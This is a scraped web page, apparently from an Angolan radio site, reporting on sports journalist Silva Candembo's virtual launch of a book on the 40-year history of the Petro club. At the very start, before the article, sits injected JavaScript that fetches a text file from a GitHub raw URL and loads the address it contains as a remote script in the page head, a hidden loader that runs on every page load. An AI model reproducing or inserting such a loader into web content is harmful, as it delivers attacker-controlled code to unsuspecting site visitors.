;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Café da Manhã com Silva Candembo | RadioPlayDigital
Café da Manhã com Silva Candembo

Café da Manhã com Silva Candembo. jornalista desportivo angolano, procedeu ao lançamento virtual da obra literária intitulada “Petro – Trajetória de Um Gigante (1980-2020)”.

Trezentas e 13 páginas, compõem o livro da autoria do jornalista, que conta a história das quatro décadas de existência do clube fundado a 14 de Janeiro de 1980, cujo lançamento estava previsto para o dia 19 do pretérito mês de Abril, mas teve que ser adiado devido a proibição de eventos públicos no país, por ameaça da covid-19, conforme informa o Jornal de Angola.

A obra prefaciada pelo presidente de direcção do clube, Tomás Faria, está repartida em cinco capítulos e 54 sub-capítulos.

Segundo uma nota do autor inserta no livro, descrita pelo Jornal de Angola “a narrativa, esta, lá está, suportada pela memória fotográfica. Embora em alguns casos faltem detalhes numéricos e nomes que deram corpo a capítulos importante desta história, os factos mais relevantes desta trajectória de 40 anos foram aqui vertidos em homenagem aos que a ‘escreveram’, antes, com os seus dribles e golos, com os seus smashs, com os seus remates, com as suas stickadas”.

Silva Candembo é jornalista desportivo há mais de 3 décadas. Conta com uma obra literária já lançada, que narra a afirmação de Basquetebol africano de 1980 a 2005.

 

TAGS: Gustavo Silva, Graça Campos, Manuel Rabelais, Marcolino Moco, Abel Campos, Jesus, Jornal de Angola, Angop, FAF, FAB, Jean Jaques, Carlos Guimarães, Afrobasket, Hóquei, Kaisara, Severino Carlos, Angolense, Kajim Ban-Gala, Luís Fernando, Victor Silva, Salas Neto, Mário Palma, Baptista Moscavide, Victorino Cunha, Paulo Macedo, Assis, 

 

PARTICIPANTES
PUB RADIO PLAY

Relacionados